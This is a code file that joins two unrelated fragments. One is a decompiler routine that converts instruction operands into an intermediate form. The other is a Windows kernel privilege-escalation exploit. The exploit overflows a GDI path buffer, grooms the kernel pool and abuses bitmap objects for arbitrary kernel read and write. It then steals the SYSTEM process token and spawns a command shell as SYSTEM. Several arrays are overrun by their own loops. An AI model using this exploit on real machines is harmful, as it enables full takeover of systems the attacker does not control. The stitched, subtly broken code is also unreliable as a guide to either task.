PINSTR CCodeList_Maker::Code_general(int type, HLType t) { // 只有type == enum_RR时,返回值才有用 if (t == i_Unknown) { t=i_Unknown; } PINSTR p = new INSTR; //new_INSTR p->type = t; switch (type) { case enum_00: InstrAddTail(p); return p; case enum_RR: { TransVar(&p->var_r1, 0); // 0 means xcpu.op[0] TransVar(&p->var_r2, 1); // 1 means xcpu.op[1] VarRead(p->va_r1); VarRead(p->va_r2); } InstrAddTail(p); return p; case enum_WR: { TransVar(&p->var_w, 0); // 0 means xcpu.op[0] TransVar(&p->var_r1, 1); // 1 means xcpu.op[1] if (t == i_Lea) { p->type = i_Assign; if (p->var_r1.type != v_Tem) { // 比如象 lea eax,[ebp] p->type = i_GetAddr; } } else { VarRead(p->va_r1); //VarWrite(&p->var_w); if (p->var_w.type == v_Tem) { WriteToAddress(p); return NULL; // 因为这里没人会用这个返回值 } } } InstrAddTail(p); return p; case enum_AR: { VAR v; TransVar(&v, 0); // 0 means xcpu.op[0] TransVar(&p->var_r2, 1); // 1 means xcpu.op[1] p->var_r1 = v; p->var_w = v; VarRead(p->va_r2); VarRead(p->va_r1); //VarWrite(&p->var_w); if (p->var_w.type == v_Tem) { WriteToAddress(p); return NULL; // 因为这里没人会用这个返回值 } } InstrAddTail(p); return p; default: alert("why here 325426"); return NULL; } //return NULL; }
void main(int argc, char* argv[]) { HDC hdc = GetDC(NULL); HDC hMemDC = CreateCompatibleDC(hdc); HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL); HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap); static POINT points[0x3fe01]; for (int l = 0; l < 0x3FE00; l++) { points[l].x = 0x5a1f; points[l].y = 0x5a1f; } points[2].y = 20; points[0x3FE00].x = 0x4a1f; points[0x3FE00].y = 0x6a1f; if (!BeginPath(hMemDC)) { fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError()); } for (int j = 0; j < 0x156; j++) { if (j > 0x1F && points[2].y != 0x5a1f) { points[2].y = 0x5a1f; } if (!PolylineTo(hMemDC, points, 0x3FE01)) { fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError()); } } EndPath(hMemDC); //Kernel Pool Fung=Shuei fungshuei(); //getchar(); fprintf(stdout, "[+] Trigerring Exploit.\r\n"); if (!FillPath(hMemDC)) { fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError()); } printf("%s\r\n", "Done filling."); HRESULT res; VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!fake) { fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError()); } memset(fake, 0x1, 0x100); bits = malloc(0x1000); memset(bits, 0x42, 0x1000); for (int k=0; k < 5000; k++) { res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1 if (res > 0x150) { fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k); hManager = bitmaps[k]; hWorker = bitmaps[k + 1]; // Get Gh05 header to fix overflown header. static BYTE Gh04[0x9]; fprintf(stdout, "\r\nGh04 header:\r\n"); for (int i = 0; i < 0x10; i++){ Gh04[i] = bits[0x1d0 + i]; fprintf(stdout, "%02x", bits[0x1d0 + i]); } // Get Gh05 header to fix overflown header. static BYTE Gh05[0x9]; fprintf(stdout, "\r\nGh05 header:\r\n"); for (int i = 0; i < 0x10; i++) { Gh05[i] = bits[0xd90 + i]; fprintf(stdout, "%02x", bits[0xd90 + i]); } // Address of Overflown Gh04 object header static BYTE addr1[0x7]; fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n"); for (int j = 0; j < 0x8; j++) { addr1[j] = bits[0x210 + j]; fprintf(stdout, "%02x", bits[0x210 + j]); } //Get pvscan0 address of second Gh05 object static BYTE* pvscan[0x07]; fprintf(stdout, "\r\nPvsca0:\r\n"); for (int i = 0; i < 0x8; i++) { pvscan[i] = bits[0xdf0 + i]; fprintf(stdout, "%02x", bits[0xdf0 + i]); } // Calculate address to overflown Gh04 object header. addr1[0x0] = 0; int u = addr1[0x1]; u = u - 0x10; addr1[1] = u; //Fix overflown Gh04 object Header SetAddress(addr1); WriteToAddress(Gh04); // Calculate address to overflown Gh05 object header. addr1[0] = 0xc0; int y = addr1[1]; y = y + 0xb; addr1[1] = y; //Fix overflown Gh05 object Header SetAddress(addr1); WriteToAddress(Gh05); // get System EPROCESS ULONG64 SystemEPROCESS = PsInitialSystemProcess(); //fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS); ULONG64 CurrentEPROCESS = PsGetCurrentProcess(); //fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS); ULONG64 SystemToken = 0; // read token from system process ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8); // write token to current process ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset; SetAddress((BYTE *)&CurProccessAddr); WriteToAddress((BYTE *)&SystemToken); // Done and done. We're System :) system("cmd.exe"); break; } if (res == 0) { fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError()); } } getchar(); //clean up DeleteObject(bitobj); DeleteObject(bitmap); DeleteDC(hMemDC); ReleaseDC(NULL, hdc); VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE); //free(points); }